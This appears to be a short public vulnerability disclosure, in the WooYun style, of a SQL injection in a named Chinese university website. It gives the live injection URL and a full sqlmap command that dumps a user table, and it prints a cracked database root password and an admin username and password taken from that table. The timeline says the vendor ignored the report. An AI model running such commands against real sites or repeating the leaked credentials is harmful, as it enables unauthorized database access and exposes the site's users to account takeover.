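2016-01-11: Details reported to the vendor; awaiting vendor handling.
2016-01-16: The vendor actively ignored the vulnerability; details disclosed to the public.
As the title says.
Injection point: http://life.cqu.edu.cn//chinese/search/index.php?search=1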
--is-dba
--passwords
After cracking, the root hash is tiantianxiangshang
sqlmap -u "http://life.cqu.edu.cn//chinese/search/index.php?search=1" -D home_page -T hp_user -C "user,passwd" --dump
Database: home_page Table: hp_user [33 entries]
Cracked one at random: admin/alahunan123456
Filtering.
Severity: no impact, ignored by vendor
Ignored at: 2016-01-16 11:58
Vulnerability Rank: 4 (WooYun rating)
None yet